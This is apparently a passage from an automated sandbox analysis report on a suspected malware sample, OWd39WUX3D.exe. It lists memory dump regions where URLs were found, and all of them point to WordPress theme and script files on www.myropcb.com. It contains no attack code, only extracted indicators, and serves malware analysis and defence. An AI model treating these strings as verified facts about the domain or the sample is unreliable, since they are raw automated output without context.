OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/js/jquery-ui.min.js
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/style.css
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/hoverIntent.js
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/superfish.js
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.js
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/thematic-dropdowns.js
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/css/classic-themes.min.css?ver=6.2.2
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/css/dist/block-library/style.min.css?ver=6.2.2
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.4
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/wlwmanifest.xml
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.myropcb.com%2F
